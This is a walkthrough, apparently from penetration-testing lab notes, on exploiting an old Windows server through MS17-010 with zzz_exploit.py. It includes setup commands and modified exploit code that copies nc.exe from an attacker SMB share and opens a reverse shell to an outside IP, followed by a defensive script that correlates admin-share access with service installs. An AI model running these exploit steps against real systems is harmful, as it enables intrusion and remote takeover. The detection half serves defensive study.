IIS 5.0
To exploit an IIS 5.0 server, the zzz_exploit.py script from the MS17-010 repository is the best choice. The script uses impacket and must run under Python 2, so first create a Python 2 virtual environment with the following steps:
1) Specify the Python version:

```shell
virtualenv -p /usr/bin/python2.7 venv
```

2) Activate the virtual environment:

```shell
source venv/bin/activate
```

3) Install impacket:

```shell
pip install impacket
```
To run the script against the target, use the following command:

```shell
python2 zzz_exploit.py 10.11.1.227
```
By default, the exploit only creates a file called pwned.txt under C:\, as shown in the following lines of the exploit:

```python
def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()
    print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)
    #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
    #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."
```
If we need a reverse shell on the server, we first have to upload an nc.exe binary. The easiest way is to serve it from an SMB share on Kali with impacket:

```shell
impacket-smbserver shareFolder $(pwd) -smb2support
```
The script then needs a slight modification so that it copies the file from the SMB share to the victim machine instead of creating pwned.txt (the closeFile() call has to go together with createFile(), otherwise fid2 is undefined):

```python
def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()
    print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    # fid2 = smbConn.createFile(tid2, '/pwned.txt')
    service_exec(conn, r'cmd /c copy \\192.168.119.241\shareFolder\nc.exe nc.exe')
    # no file handle is opened above, so closeFile() is commented out as well
    # smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)
    #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
    #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."
```
Finally, with a listener waiting on port 1234, we can bring up the nc connection as usual:

```python
def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()
    print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    # fid2 = smbConn.createFile(tid2, '/pwned.txt')
    # service_exec(conn, r'cmd /c copy \\192.168.119.241\shareFolder\nc.exe nc.exe')
    service_exec(conn, r'cmd /c nc.exe -e cmd.exe 192.168.119.241 1234')
    # no file handle is opened above, so closeFile() is commented out as well
    # smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)
    #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
    #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."
```
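From the defender's side, the three smb_pwn() variants above leave the same footprint on the target: an SMB session to the C$ administrative share followed, seconds later, by a service being installed to run the chosen command (that is how service_exec() executes "cmd /c ..."). The following is an added example, not part of the original post or of zzz_exploit.py, that correlates those two Windows events (Security 5140 "network share object was accessed" and System 7045 "a service was installed") from constructed JSON log lines; the timestamps, IP addresses, account and service names in the sample are made up for the example.

```python
"""Correlate admin-share access (5140) with a service install (7045).

Added example for the zzz_exploit walkthrough; not code from the original
post or from the MS17-010 repository. The log lines are constructed.
"""
import json
from datetime import datetime, timedelta

# Constructed sample events, one JSON object per line, in the shape a log
# forwarder might emit. The admin-share hit and the service install
# mirror what the walkthrough's smb_pwn() does on the target.
SAMPLE_LOG = r"""
{"ts": "2024-01-10T08:00:00", "channel": "System", "event_id": 7045, "service_name": "Backup Agent", "image_path": "C:\\Program Files\\Backup\\agent.exe"}
{"ts": "2024-01-10T09:00:00", "channel": "Security", "event_id": 5140, "share_name": "\\\\*\\Public", "source_address": "192.0.2.50", "account": "jsmith"}
{"ts": "2024-01-10T10:00:00", "channel": "Security", "event_id": 5140, "share_name": "\\\\*\\C$", "source_address": "192.0.2.10", "account": "ANONYMOUS LOGON"}
{"ts": "2024-01-10T10:00:03", "channel": "System", "event_id": 7045, "service_name": "svc_constructed", "image_path": "cmd /c copy \\\\192.0.2.10\\shareFolder\\nc.exe nc.exe"}
"""

# Administrative shares that the exploit's smb_pwn() connects to (C$);
# ADMIN$ is included because psexec-style tooling commonly uses it.
ADMIN_SHARES = {r"\\*\C$", r"\\*\ADMIN$"}
WINDOW = timedelta(minutes=5)   # how long after a share hit a service install is suspicious


def parse_events(log_text):
    """Parse one JSON event per line (blank lines skipped), sorted by time."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def correlate(events, window=WINDOW):
    """Return one alert per 7045 service install that is preceded, within
    `window`, by a 5140 access to an administrative share.

    7045 carries no source address, so the pairing is purely temporal on
    the same host; this is a heuristic, not proof of the same actor.
    """
    admin_share_hits = []
    alerts = []
    for ev in events:
        if ev["event_id"] == 5140 and ev.get("share_name", "").upper() in ADMIN_SHARES:
            admin_share_hits.append(ev)
        elif ev["event_id"] == 7045:
            for hit in admin_share_hits:
                delta = ev["ts"] - hit["ts"]
                if timedelta(0) <= delta <= window:
                    alerts.append({
                        "service_name": ev["service_name"],
                        "image_path": ev["image_path"],
                        "share_name": hit["share_name"],
                        "source_address": hit["source_address"],
                        "seconds_after_share_access": delta.total_seconds(),
                    })
                    break   # one alert per service install is enough
    return alerts


def analyze(log_text):
    """Convenience wrapper: parse the log text and return the alerts."""
    return correlate(parse_events(log_text))


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print("ALERT: service %(service_name)r installed %(seconds_after_share_access).0fs "
              "after %(share_name)s was accessed from %(source_address)s; "
              "image path: %(image_path)s" % alert)
```

On the constructed sample only the 10:00:03 install is flagged: the "Backup Agent" install has no admin-share access before it, and the 09:00 access is to a non-administrative share. The pattern is the same whether the payload is the page's nc.exe copy, the reverse shell, or the "msfvenom -f exe-service" binary the exploit's comment mentions, which is why the service install rather than the binary name is the thing to alert on. The real fix for the target is still the MS17-010 patch and disabling SMBv1.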